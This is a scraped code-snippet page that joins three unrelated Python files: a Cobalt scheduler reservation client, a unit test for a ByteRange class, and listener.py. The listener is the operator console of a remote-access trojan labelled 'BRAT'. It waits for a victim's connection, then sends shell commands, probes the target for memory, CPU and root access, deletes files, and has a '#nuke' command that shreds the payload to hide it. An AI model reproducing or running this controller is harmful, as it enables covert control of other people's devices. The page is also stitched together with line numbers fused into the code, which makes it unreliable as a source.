Best Python code snippet using autotest_python
setres.py
Source:setres.py  
1#!/usr/bin/env python2"""3Setup reservations in the scheduler4Usage: %prog --help5Usage: %prog [options] <partition1> ... <partitionN>6version: "%prog " + __revision__ + , Cobalt  + __version__7OPTIONS DEFINITIONS:8'-A','--project',dest='project',type='string',help='set project name for partitions in args'9'-D','--defer',dest='defer',help='defer flag. needs to be used with -m',action='store_true'10'-c','--cycletime',dest='cycle',type='string',help='set cycle time in minutes or HH:MM:SS',callback=cb_time11'-d','--duration',dest='duration',type='string',help='duration time in minutes or HH:MM:SS',callback=cb_time12'-m','--modify_res',dest='modify_res',help='modify current reservation specified in -n',action='store_true'13'-n','--name',dest='name',type='string',help='reservation name to add or modify'14'-p','--partitions',dest='partitions',type='string',help='partition(s) (now optional) part1:..:partN'15'-q','--queue',dest='queue',type='string',help='queue name'16'-s','--starttime',dest='start',type='string',help='start date time: YYYY_MM_DD-HH:MM, or now',callback=cb_date17'-u','--user',dest='users',type='string',help='user id list (user1:user2:... or "*" for all users)',callback=cb_res_users18'--debug',dest='debug',help='turn on communication debugging',callback=cb_debug19'--allow_passthrough',dest='block_passthrough',help='allow passthrough',callback=cb_passthrough20'--block_passthrough',dest='block_passthrough',help='do not allow passthrough',callback=cb_passthrough21OPTIONS TO CHANGE IDS ONLY:22'--cycle_id',dest='cycle_id',type='int',help='cycle id'23'--force_id',dest='force_id',default=False,help='force id flag (only used with --cycle_id or --res_id',action='store_true'24'--res_id',dest='res_id',type='int',help='res id'25"""26import logging27import math28import sys29import time30from Cobalt import client_utils31from Cobalt.client_utils import cb_debug, cb_time, cb_date, cb_passthrough, cb_res_users32from Cobalt.Util import expand_num_list, compact_num_list33from Cobalt.arg_parser import ArgParse34__revision__ = '$Id: setres.py 2154 2011-05-25 00:22:56Z richp $'35__version__ = '$Version$'36SCHMGR = client_utils.SCHMGR37SYSMGR = client_utils.SYSMGR38def validate_starttime(parser):39    """40    make sure the start time plus duration is valid41    """42    _localtime = client_utils.parse_datetime(client_utils.cobalt_date(time.localtime(time.time())))43    _res_st    = parser.options.start + parser.options.duration44    if _res_st < _localtime:45        client_utils.logger.error("Start time + duration %s already in the pass", client_utils.sec_to_str(_res_st))46        sys.exit(1)47def set_res_id(parser):48    """49    set res id50    """51    if parser.options.force_id:52        client_utils.component_call(SCHMGR, False, 'force_res_id', (parser.options.res_id,))53        client_utils.logger.info("WARNING: Forcing res id to %s" % parser.options.res_id)54    else:55        client_utils.component_call(SCHMGR, False, 'set_res_id', (parser.options.res_id,))56        client_utils.logger.info("Setting res id to %s" % parser.options.res_id)57def set_cycle_id(parser):58    """59    set res id60    """61    cycle_id = parser.options.cycle_id62    if parser.options.force_id:63        client_utils.component_call(SCHMGR, False, 'force_cycle_id', (cycle_id,))64        client_utils.logger.info("WARNING: Forcing cycle id to %s" % str(cycle_id))65    else:66        client_utils.component_call(SCHMGR, False, 'set_cycle_id', (cycle_id,))67        client_utils.logger.info("Setting cycle_id to %s" % str(cycle_id))68def verify_locations(partitions):69    """70    verify that partitions are valid71    """72    check_partitions = partitions73    system_type = client_utils.component_call(SYSMGR, False, 'get_implementation', ())74    # if we have args then verify the args (partitions)75    if system_type in ['alps_system']:76        # nodes come in as a compact list.  expand this.77        check_partitions = []78        # if we're not a compact list, convert to a compact list.  Get this,79        # ideally, in one call80        for num_list in partitions:81            check_partitions.extend(expand_num_list(num_list))82            test_parts = client_utils.component_call(SYSMGR, False,83            'verify_locations', (check_partitions,))84            # On Cray we will be a little looser to make setting reservations85            # easier.86            client_utils.logger.info('Found Nodes: %s', compact_num_list(test_parts))87            missing_nodes = set(check_partitions) - set(test_parts)88            if len(missing_nodes) != 0:89                # TODO: relax this, we should allow for this to occur, but90                # reservation-queue data amalgamation will need a fix to get91                # this to work. --PMR92                client_utils.logger.error("Missing partitions: %s" % (",".join([str(nid) for nid in missing_nodes])))93                client_utils.logger.error("Aborting reservation setup.")94                sys.exit(1)95            #sys.exit(1)96    else:97        for p in check_partitions:98            test_parts = client_utils.component_call(SYSMGR, False,99                    'verify_locations', (check_partitions,))100            if len(test_parts) != len(check_partitions):101                missing = [p for p in check_partitions if p not in test_parts]102                client_utils.logger.error("Missing partitions: %s" % (" ".join(missing)))103                sys.exit(1)104def validate_args(parser,spec,opt_count):105    """106    Validate setres arguments. Will return true if we want to continue processing options.107    """108    system_type = client_utils.component_call(SYSMGR, False, 'get_implementation', ())109    if parser.options.partitions is not None:110        parser.args += [part for part in parser.options.partitions.split(':')]111    if parser.options.cycle_id is not None or parser.options.res_id is not None:112        only_id_change = True113        if not parser.no_args() or (opt_count != 0):114            client_utils.logger.error('No partition arguments or other options allowed with id change options')115            sys.exit(1)116    else:117        only_id_change = False118    if parser.options.force_id and not only_id_change:119        client_utils.logger.error("--force_id can only be used with --cycle_id and/or --res_id.")120        sys.exit(1)121    if only_id_change:122        # make the ID change and we are done with setres123        if parser.options.res_id is not None:124            set_res_id(parser)125        if parser.options.cycle_id is not None:126            set_cycle_id(parser)127        continue_processing_options = False # quit, setres is done128    else:129        if parser.options.name is None:130            client_utils.print_usage(parser)131            sys.exit(1)132        if parser.no_args() and (parser.options.modify_res is None):133            client_utils.logger.error("Must supply either -p with value or partitions as arguments")134            sys.exit(1)135        if parser.options.start is None and parser.options.modify_res is None:136            client_utils.logger.error("Must supply a start time for the reservation with -s")137            sys.exit(1)138        if parser.options.duration is None and parser.options.modify_res is None:139            client_utils.logger.error("Must supply a duration time for the reservation with -d")140            sys.exit(1)141        if parser.options.defer is not None and (parser.options.start  is not None or parser.options.cycle is not None):142            client_utils.logger.error("Cannot use -D while changing start or cycle time")143            sys.exit(1)144        # if we have command line arguments put them in spec145        if system_type in ['alps_system']:146            if not parser.no_args():147                nodes = []148                for arg in parser.args:149                    nodes.extend(expand_num_list(arg))150                compact_nodes = compact_num_list(nodes)151                verify_locations([compact_nodes])152                spec['partitions'] = compact_nodes153        else:154            if not parser.no_args():155                verify_locations(parser.args)156            if not parser.no_args(): spec['partitions'] = ":".join(parser.args)157        continue_processing_options = True # continue, setres is not done.158    return continue_processing_options159def modify_reservation(parser):160    """161    this will handle reservation modifications162    """163    query = [{'name':parser.options.name, 'start':'*', 'cycle':'*', 'duration':'*'}]164    res_list = client_utils.component_call(SCHMGR, False, 'get_reservations', (query,))165    if not res_list:166        client_utils.logger.error("cannot find reservation named '%s'" % parser.options.name)167        sys.exit(1)168    updates = {} # updates to reservation169    if parser.options.defer is not None:170        res = res_list[0]171        if not res['cycle']:172            client_utils.logger.error("Cannot use -D on a non-cyclic reservation")173            sys.exit(1)174        start    = res['start']175        duration = res['duration']176        cycle    = float(res['cycle'])177        now      = time.time()178        periods  = math.floor((now - start)/cycle)179        if periods < 0:180            start += cycle181        elif(now - start) % cycle < duration:182            start += (periods + 1) * cycle183        else:184            start += (periods + 2) * cycle185        newstart = time.strftime("%c", time.localtime(start))186        client_utils.logger.info("Setting new start time for for reservation '%s': %s" % (res['name'], newstart))187        updates['start'] = start188        #add a field to updates to indicate we're deferring:189        updates['defer'] = True190    else:191        if parser.options.start is not None:192            updates['start'] = parser.options.start193        if parser.options.duration is not None:194            updates['duration'] = parser.options.duration195    if parser.options.users is not None:196        updates['users'] = None if parser.options.users == "*" else parser.options.users197    if parser.options.project is not None:198        updates['project'] = parser.options.project199    if parser.options.cycle is not None:200        updates['cycle'] = parser.options.cycle201    if not parser.no_args():202        updates['partitions'] = ":".join(parser.args)203    if parser.options.block_passthrough is not None:204        updates['block_passthrough'] = parser.options.block_passthrough205    comp_args = ([{'name':parser.options.name}], updates, client_utils.getuid())206    client_utils.component_call(SCHMGR, False, 'set_reservations', comp_args)207    reservations = client_utils.component_call(SCHMGR, False, 'get_reservations',208                                               ([{'name':parser.options.name, 'users':'*','start':'*', 'duration':'*',209                                                   'partitions':'*', 'cycle': '*', 'res_id': '*', 'project':'*',210                                                   'block_passthrough':'*'}], ))211    client_utils.logger.info(reservations)212    client_utils.logger.info(client_utils.component_call(SCHMGR, False, 'check_reservations', ()))213def add_reservation(parser,spec,user):214    """215    add reservation216    """217    validate_starttime(parser)218    spec['users']   = None if parser.options.users == '*' else parser.options.users219    spec['cycle']   = parser.options.cycle220    spec['project'] = parser.options.project221    if parser.options.block_passthrough is None:222        spec['block_passthrough'] = False223    client_utils.logger.info(client_utils.component_call(SCHMGR, False, 'add_reservations', ([spec], user)))224    client_utils.logger.info(client_utils.component_call(SCHMGR, False, 'check_reservations', ()))225def main():226    """227    setres main228    """229    # setup logging for client. The clients should call this before doing anything else.230    client_utils.setup_logging(logging.INFO)231    spec     = {} # map of destination option strings and parsed values232    opts     = {} # old map233    opt2spec = {}234    # list of callback with its arguments235    callbacks = [236        # <cb function>           <cb args>237        [ cb_time                , (False, True, True) ], # no delta time, Seconds, return int238        [ cb_date                , (True,) ], # Allow to set the date to 'now'239        [ cb_passthrough         , () ],240        [ cb_debug               , () ],241        [ cb_res_users           , () ]]242    # Get the version information243    opt_def =  __doc__.replace('__revision__',__revision__)244    opt_def =  opt_def.replace('__version__',__version__)245    parser = ArgParse(opt_def,callbacks)246    user = client_utils.getuid()247    parser.parse_it() # parse the command line248    opt_count = client_utils.get_options(spec, opts, opt2spec, parser)249    # if continue to process options then250    if validate_args(parser,spec,opt_count):251        # modify an existing reservation252        if parser.options.modify_res is not None:253            modify_reservation(parser)254        # add new reservation255        else:256            add_reservation(parser,spec,user)257if __name__ == '__main__':258    try:259        main()260    except SystemExit:261        raise262    except Exception, exc:263        client_utils.logger.fatal("*** FATAL EXCEPTION: %s ***", exc)...listener.py
Source:listener.py  
1import os2import sys3from time import sleep4host = sys.argv[1]5port = int(sys.argv[2])6output = sys.argv[3]7import socket8import sys9from time import asctime10from time import sleep11print(("[" + asctime() + "] Listening on port " + str(port)))12sleep(1)13try:14    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)15    s.bind((host, port))16    s.listen(5)17    print("[" + asctime() + "] Waiting Connection From Client...")18    c, _ = s.accept()19    print(('[' + asctime() + '] Session Opened | ' + 'IP : ' + _[0] + ' | Port : ' + str(_[1])+'\n'))20    sleep(2)21except OSError as error:22    print('[i] ' + str(error))23    sys.exit()24def raw_converter(string):25    string = str(string)26    n = r'\n'27    t = r'\t'28    bs = r"b'"29    be = r"\n'"30    result = string.replace(bs, '')31    result = result.replace(be, r'\n')32    result = result.replace(n, '\n')33    result = result.replace(t, '\t')34    return result35def main(prog_name):36    and_pwd = ' && pwd\n'37    meminfo = 'cat /proc/meminfo'38    nuke_it = 'shred --force -n 35 -u -v -z ' + prog_name39    cpuinfo = 'cat /proc/cpuinfo'40    crypto = 'cat /proc/crypto'41    check_root = 'which su'42    check_partitions = 'cat /proc/partitions'43    whoami = 'whoami'44    and_pwd = and_pwd.encode()45    meminfo = meminfo.encode()46    nuke_it = nuke_it.encode()47    cpuinfo = cpuinfo.encode()48    crypto = crypto.encode()49    check_root = check_root.encode()50    check_partitions = check_partitions.encode()51    whoami = whoami.encode()52    print("[i] Type '#help' for information.")53    while True:54        hosttt = _[0]55        cmd = input('[' + asctime() + ' | BRAT@' + hosttt + ']: ')56        57        if cmd[0:5] == 'mkdir':58            cmd = cmd.encode()59            c.send(cmd+and_pwd)60            output = c.recv(100000)61            output = raw_converter(output)62            print(output)63        64        elif cmd == 'meminfo':65            c.send(meminfo)66            output = c.recv(100000)67            output = raw_converter(output)68            print(output)69        70        elif cmd == 'cpuinfo':71            c.send(cpuinfo)72            output = c.recv(100000)73            output = raw_converter(output)74            print(output)75        76        elif cmd == 'crypto':77            c.send(crypto)78            output = c.recv(100000)79            output = raw_converter(output)80            print(output)81        82        elif cmd == 'kernel_info':83            cmd = cmd.encode()84            c.send(cmd)85            ab = c.recv(100000)86            ab = raw_converter(ab)87            print(("\n[+] \033[37;1mKernel Version : "+str(ab)))88        89        elif cmd == 'check_root':90            c.send(check_root)91            a = c.recv(100000)92            if a == r'\n/system/bin/su\n':93                print("\n[*] This Device Is Rooted...\n")94            95            else:96                print("\n[*] This Device Not Rooted...\n")97            98        elif cmd == 'su':99            print("\n[*] Command 'SU' Not *Yet* Working...\n")100            continue101        102        elif cmd == 'check_partitions':103            c.send(check_partitions)104            print('')105            output = c.recv(1000000)106            output = raw_converter(output)107            print(output)108        109        elif cmd == '#help':110            print("""111#help            : Shows this help menu112kernel_info      : Check Kernel Version + Info113mkdir            : Create Directory On Target114meminfo          : Check Info Memory Target115cpuinfo          : Check Info CPU Target116rm               : Remove File On Target117rmdir            : Remove Folder On Target118whoami           : Check Name User Target119crypto           : Check Encoding On Target120check_partitions : Check Info Partisi On Target121#nuke            : Shred and delete the payload from the victim's machine122#logout          : Close the connection123""")124        elif cmd[0:2] == 'rm':125            cmd = cmd.encode()126            c.send(cmd+and_pwd)127            output = c.recv(100000)128            output = raw_converter(output)129        130        elif cmd[0:5] == 'rmdir':131            cmd = cmd.encode()132            c.send(cmd+and_pwd)133            output = c.recv(100000)134            output = raw_converter(output)135            print(output)136        137        elif cmd[0:6] == 'whoami':138            c.send(whoami)139            output = c.recv(100000)140            output = raw_converter(output)141            print(output)142        elif cmd == '#nuke':143            c.send(nuke_it)144            output = c.recv(100000)145            output = raw_converter(output)146            print(output)147        elif cmd == '#logout':148            #c.close()149            print("[" + asctime() + "] Connection closed by local host...")150            break151        152        elif cmd == '':153            continue154        155        else:156            cmd = cmd.encode()157            c.send(cmd)158            results = c.recv(100000)159            results = raw_converter(results)160            if results == 'bacod':161                continue162            print(results)163try:164    main(output)165except KeyboardInterrupt:166    print("[!] CTRL+C Detected. Shutdown Server...")167    sleep(2)168    sys.exit()169except socket.error:170    print("[!] Connection closed by foreign host...")171    sleep(2)...test_byte_range.py
Source:test_byte_range.py  
...12    def check_partition(self, byte_range, expected):13        assert isinstance(byte_range, ByteRange)14        assert isinstance(expected, bool)15        self.assertEqual(expected, byte_range.does_partition())16    def check_partitions(self, *params):17        assert len(params) % 2 == 018        for idx in xrange(0, len(params), 2):19            self.check_partition(params[idx], params[idx+1])20    def test_add_subrange(self):21        """22        Test add_subrange() method23        """24        br = ByteRange(0, 1000)25        self.check_partition(br, True)26        self.assertEqual('<BytesRange:0-1000>', str(br))27        # Add 1st subrange28        br.add_subrange(offset=100, length=51)29        self.check_partition(br, False)30        self.check_subranges(br, (100, 151))31        # Add a subrange in the front32        br.add_subrange(offset=50, length=7)33        self.check_partition(br, False)34        self.check_subranges(br, (50, 57), (100, 151))35        # Add a subrange in the end36        br.add_subrange(offset=200, length=800)37        self.check_partition(br, False)38        self.check_subranges(br, (50, 57), (100, 151), (200, 1000))39        # Fill out the remaining gap to completely cover the byte range40        br.add_subrange(offset=0, length=50)41        br.add_subrange(offset=57, length=43)42        br.add_subrange(offset=151, length=49)43        self.check_partition(br, True)44        self.check_subranges(br, (0, 50), (50, 57), (57, 100), (100, 151), (151, 200), (200, 1000))45    def test_nested_subranges(self):46        """47        Test nested subranges methods48        """49        br1 = ByteRange(0, 100)50        self.check_partitions(br1, True)51        # Add 2nd layer52        br11 = br1.add_subrange(0, 20)53        self.check_partitions(br1, False, br11, True)54        br12 = br1.add_subrange(20, 50)55        self.check_partitions(br1, False, br12, True)56        br13 = br1.add_subrange(70, 30)57        self.check_partitions(br1, True, br13, True)58        # Add 3rd layer59        br121 = br12.add_subrange(0, 30)60        self.check_partitions(br1, False, br12, False, br121, True)61        br122 = br12.add_subrange(30, 20)62        self.check_partitions(br1, True, br12, True, br122, True)63        # Add 4th layer64        br1211 = br121.add_subrange(0, 15)65        self.check_partitions(br1, False, br12, False, br121, False, br1211, True)66        br1212 = br121.add_subrange(15, 10)67        self.check_partitions(br1, False, br12, False, br121, False, br1212, True)68        br1213 = br121.add_subrange(25, 5)69        self.check_partitions(br1, True, br12, True, br121, True, br1213, True)70        # Verify all the absolute offsets71        self.assertEqual((0, 20), br11.abs_range())72        self.assertEqual((20, 35), br1211.abs_range())73        self.assertEqual((35, 45), br1212.abs_range())74        self.assertEqual((45, 50), br1213.abs_range())75        self.assertEqual((50, 70), br122.abs_range())76        self.assertEqual((70, 100), br13.abs_range())77    def test_errors(self):78        br = ByteRange(0, 100)79        # Add 2 subranges80        br.add_subrange(20, 10)81        br.add_subrange(60, 20)82        # Add an overlapping subrange in front of 1st subrange83        self.assertRaises(ValueError, lambda: br.add_subrange(0, 21))...Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.
Get 100 minutes of automation test minutes FREE!!
